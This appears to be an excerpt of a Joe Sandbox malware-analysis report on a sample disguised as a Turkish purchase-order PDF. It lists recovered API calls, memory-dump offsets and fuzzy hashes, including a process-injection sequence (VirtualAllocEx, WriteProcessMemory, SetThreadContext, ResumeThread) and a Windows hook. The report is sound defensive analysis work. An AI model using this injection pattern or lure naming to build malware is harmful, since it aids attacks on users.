                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05E968E6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: c293eec13b72c622a84eced1991a980f24326574c75546a5a0598a92b18bd8f9
                                • Instruction ID: 6b785954ef792f92bd5f100af421b495f2e07fee3467f302bda0e09b7fce8efa
                                • Opcode Fuzzy Hash: c293eec13b72c622a84eced1991a980f24326574c75546a5a0598a92b18bd8f9
                                • Instruction Fuzzy Hash: 34914B71D00219DFEF24CF68C845BEDBBB2BF48314F1485AAD899A7240DB749985CF91

                                Control-flow Graph (rendered graph): basic blocks 271ae30-271b0b0, API call GetModuleHandleW, internal calls to 2719838, 271a814, 271a824, 271a834, 271a844, 271b0b8, 271b0c8
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0271B086
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: ea02ec177e1418f1a7ffb7b5445a25fd6eb2bad7e4a5c56c3a37e60925dc4718
                                • Instruction ID: 4b14c5b869f99965e7cdea6035aa9e4f3657471aca024990fb4975d92c98a262
                                • Opcode Fuzzy Hash: ea02ec177e1418f1a7ffb7b5445a25fd6eb2bad7e4a5c56c3a37e60925dc4718
                                • Instruction Fuzzy Hash: F97157B0A01B058FD724DF2AD04579ABBF2FF88304F00892DD49AD7A50DB75E94ACB91

                                Control-flow Graph (rendered graph): basic blocks 271449c-2715a61, API call CreateActCtxA
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 027159C9
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: ffc3343ddc57523a9492bc24f67219235f474b113f95540e3b1d72b2f044b8be
                                • Instruction ID: 0be97ffc23e172d4d0465ec80ee0d2ba2dbe0ad69bbd425435a6c910f70284c1
                                • Opcode Fuzzy Hash: ffc3343ddc57523a9492bc24f67219235f474b113f95540e3b1d72b2f044b8be
                                • Instruction Fuzzy Hash: E041D2B0C00718CBEB24CFA9C884B9EBBB5BF49304F60806AD409AB251DB716949CF90

                                Control-flow Graph (rendered graph): basic blocks 271590c-2715a61, API call CreateActCtxA
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 027159C9
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 5a02ff0ad083c51c2e1c000c77390af04dafdfc5f57a74b2228730ff4f430107
                                • Instruction ID: 005fee4dded69fe16da3a0177de1224780e20ccd01caf38946ff264d557544c9
                                • Opcode Fuzzy Hash: 5a02ff0ad083c51c2e1c000c77390af04dafdfc5f57a74b2228730ff4f430107
                                • Instruction Fuzzy Hash: 0641E2B0C00718CBEB24DFA9C884BDEBBB1BF49304F64806AD458AB251DB756949CF51

                                Control-flow Graph (rendered graph): basic blocks 5e96421-5e964fe, API call WriteProcessMemory
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05E964B8
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: c446f0594990e03ad2304e93dff94119b8c1e98383fde32a07bb4fb2cb26a1d3
                                • Instruction ID: c93e0075a7ceeddda8ff6777ae6a82cf800980d5447e943b503f4fdb58274de7
                                • Opcode Fuzzy Hash: c446f0594990e03ad2304e93dff94119b8c1e98383fde32a07bb4fb2cb26a1d3
                                • Instruction Fuzzy Hash: 382155B19003099FDF00CFAAC981BEEBBF5FF48314F54842AE959A7241D7789944CBA4

                                Control-flow Graph (rendered graph): basic blocks 5e96428-5e964fe, API call WriteProcessMemory
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05E964B8
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: c59255b4de98369263b956b668480a3dfc1f8a36816f2be65e5725e6159ad707
                                • Instruction ID: 731e117ab6d4ce4a8e0ece726be8021bbc110a2eac28c81d1c864f3522e4fea1
                                • Opcode Fuzzy Hash: c59255b4de98369263b956b668480a3dfc1f8a36816f2be65e5725e6159ad707
                                • Instruction Fuzzy Hash: 0B2164B19003099FDF00CFAAC981BEEBBF5FF48310F10842AE959A7240C7789944CBA4

                                Control-flow Graph (rendered graph): basic blocks 271d2f8-271d3ba, API call DuplicateHandle
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0271D387
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: cd4aa0d424ab5c95d30236875480efdc4f23b31b5c704268e5a37c164c24cdb7
                                • Instruction ID: 6f8ba8be94823027c39f051ed9a36736218968443f54d66abcd6dc9e8a61edac
                                • Opcode Fuzzy Hash: cd4aa0d424ab5c95d30236875480efdc4f23b31b5c704268e5a37c164c24cdb7
                                • Instruction Fuzzy Hash: D82103B5900248DFDB10CFAAD584ADEBBF5EF48320F14846AE958A3310D374A954CFA5

                                Control-flow Graph (rendered graph): basic blocks 5e96518-5e965de, API call ReadProcessMemory
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05E96598
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: c8bd62ad3988c99c5645015e494c6092b26208e5a94c084d337357cf4d3d0db4
                                • Instruction ID: 2686f3cd28b921b49984c04a845073d8e266b175f059870829fe5604ce822d44
                                • Opcode Fuzzy Hash: c8bd62ad3988c99c5645015e494c6092b26208e5a94c084d337357cf4d3d0db4
                                • Instruction Fuzzy Hash: 872116B18003499FDF10DFAAC881BEEBBF5FF48310F50842AE959A7240C7749541CBA4

                                Control-flow Graph (rendered graph): basic blocks 5e96510-5e965de, API call ReadProcessMemory
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05E96598
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 5bed5125050bb1390492cd879d394f4e30803ce545f458a3e006767a27ec159a
                                • Instruction ID: d6a496b864d429bed2045e11985a0ef03ccdc635917ecb22575e6b5b37ae7ded
                                • Opcode Fuzzy Hash: 5bed5125050bb1390492cd879d394f4e30803ce545f458a3e006767a27ec159a
                                • Instruction Fuzzy Hash: 3C2134B18003599FDF00CFAAC9817EEBBF1FF48310F54882AE959A7240C7789941CBA4

                                Control-flow Graph (rendered graph): basic blocks 5e95e58-5e95f1c, API call Wow64SetThreadContext
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05E95ED6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 5dba208c41018200f42412c395d469de92be794d199bde915906c635491a8597
                                • Instruction ID: cb3a1889998e4940adfda86b9e0cfd303ab1d732381f110de082b20e937d52d7
                                • Opcode Fuzzy Hash: 5dba208c41018200f42412c395d469de92be794d199bde915906c635491a8597
                                • Instruction Fuzzy Hash: 972135B19043088FDB14DFAAC4857EEBBF4EF48314F54842ED899A7241CB789945CFA4

                                Control-flow Graph (rendered graph): basic blocks 5e95e50-5e95f1c, API call Wow64SetThreadContext
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05E95ED6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: d2d3431be085eab38f302c4b7686e4cf8c18a9392a96f22cb686023527565cd1
                                • Instruction ID: 68e7dff50e812987af32ce7671b1410d6aac6c2c044506bcd026cc09c6c0a878
                                • Opcode Fuzzy Hash: d2d3431be085eab38f302c4b7686e4cf8c18a9392a96f22cb686023527565cd1
                                • Instruction Fuzzy Hash: 302145B1D003088FEB14CFAAC5857EEBBF4AF48314F14842AD599A7241D7B89544CFA0

                                Control-flow Graph (rendered graph): basic blocks 271d300-271d3ba, API call DuplicateHandle
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0271D387
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 104bdaa6f5617b149d706b8c6fea849bb0949ea8ce91a60f8db5de7308baf0d9
                                • Instruction ID: cf9a2daa62bdd4c4c610fd49671b02d6b941bfa0eb8477320643bffa54475bee
                                • Opcode Fuzzy Hash: 104bdaa6f5617b149d706b8c6fea849bb0949ea8ce91a60f8db5de7308baf0d9
                                • Instruction Fuzzy Hash: 5521E2B5900248DFDB10CFAAD984ADEFBF9EF48310F14802AE958A3350D374A954CFA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05E963D6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: babf56325e13782c6bd27a6c4d19e26d2ccfc5e53807ca6a026be65b73e6c622
                                • Instruction ID: 300f69d8a869899fe16799e8e8d9984240d4adfc01d64935d5c987f43eb0b2ab
                                • Opcode Fuzzy Hash: babf56325e13782c6bd27a6c4d19e26d2ccfc5e53807ca6a026be65b73e6c622
                                • Instruction Fuzzy Hash: C51197728003089FDF10CFAAC845BEEBBF5EF88320F14842AE955A7250C775A540CFA4
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0271B101,00000800,00000000,00000000), ref: 0271B312
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 0c7682e0eb7d8415ef7ce732f8fed3693fabf07420a733df69aec22a2a69a819
                                • Instruction ID: fb496ffba03be9e28f4984f1a6b8e80f46555aa71c217362d2388718403b0880
                                • Opcode Fuzzy Hash: 0c7682e0eb7d8415ef7ce732f8fed3693fabf07420a733df69aec22a2a69a819
                                • Instruction Fuzzy Hash: E51100B69003489FDB10CF9AD444AAEFBF4EF88314F10846AE859A7200C3B5A545CFA5
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0271B101,00000800,00000000,00000000), ref: 0271B312
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: eceba01adc19438f5f5d39cef5da3944bdcb22ede3c84e5734b063f3e02ece83
                                • Instruction ID: 77d05fd881df380323c80a54b98f820e4fb9f77b872ab737d05c0e8864f98b4b
                                • Opcode Fuzzy Hash: eceba01adc19438f5f5d39cef5da3944bdcb22ede3c84e5734b063f3e02ece83
                                • Instruction Fuzzy Hash: 241103B69002488FDB10CFAAC444ADEFBF4EF88314F14846ED859A7200C375A549CFA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05E963D6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 7b9463d5bae3327a52fa912b3027ab8b97010bcf1c92d68d979e857d5b22601d
                                • Instruction ID: 307286183eb888a83ced84c32a311a6392714dd571ef26d5949555c418de4a2e
                                • Opcode Fuzzy Hash: 7b9463d5bae3327a52fa912b3027ab8b97010bcf1c92d68d979e857d5b22601d
                                • Instruction Fuzzy Hash: 0F1134718003489FDF10DFAAC845BEEBBF5EF88320F14842AE959A7250C775A940CFA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 0a5fadacc3c52ad32ec6414478e9f262ba94576f45adf9c9fbd04b96411c9087
                                • Instruction ID: bd6941450189e9db93c69d6fe0a570cf8e0b6846d26fc40e0c6758b4ef976196
                                • Opcode Fuzzy Hash: 0a5fadacc3c52ad32ec6414478e9f262ba94576f45adf9c9fbd04b96411c9087
                                • Instruction Fuzzy Hash: 051158B18043488FDB20DFAAC4457EEFBF5EF88314F14842ED459A7240CB75A944CBA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 05E99BC5
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 05E99BC5
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0271B086
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319169308.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d1d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319169308.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d1d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319273370.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d2d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319273370.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d2d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319273370.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d2d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319169308.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d1d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319169308.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d1d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1319273370.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_d2d000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:

                                Execution Graph

                                Execution Coverage:11.4%
                                Dynamic/Decrypted Code Coverage:92.7%
                                Signature Coverage:0%
                                Total number of Nodes:150
                                Total number of Limit Nodes:15

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0617C66E
                                • GetCurrentThread.KERNEL32 ref: 0617C6AB
                                • GetCurrentProcess.KERNEL32 ref: 0617C6E8
                                • GetCurrentThreadId.KERNEL32 ref: 0617C741
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0617C66E
                                • GetCurrentThread.KERNEL32 ref: 0617C6AB
                                • GetCurrentProcess.KERNEL32 ref: 0617C6E8
                                • GetCurrentThreadId.KERNEL32 ref: 0617C741
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 02ABFCD3
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544611868.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_2ab0000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0

                                Control-flow Graph

                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06178BEA
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: e17d4b363a62cd27ad104a363dc5219671073dd869bcbd6c5f20d2a420da4024
                                • Instruction ID: 970747a62c3308d5ade5de54a92b9d1b8abaca8f80be04c0a2356ddc696d41e3
                                • Opcode Fuzzy Hash: e17d4b363a62cd27ad104a363dc5219671073dd869bcbd6c5f20d2a420da4024
                                • Instruction Fuzzy Hash: 4051DFB1D003099FDB54CFAAC984ADEBFB1BF48310F24862AE419AB210D7759945CF90

                                Control-flow Graph (function at 6178ad8, calls CreateWindowExW; rendered graph not reproduced)
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06178BEA
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 5de27f40d718682d498a9b9d642d3117399be3f458ebe1511e2b069a162baace
                                • Instruction ID: 61dc4355c048c7228fc055a438abdce8625d92098420a1d25afb68531e1e6d15
                                • Opcode Fuzzy Hash: 5de27f40d718682d498a9b9d642d3117399be3f458ebe1511e2b069a162baace
                                • Instruction Fuzzy Hash: 7841CFB1D003089FDB54CF9AC984ADEBBF5BF48310F24862AE818AB250D775A845CF90

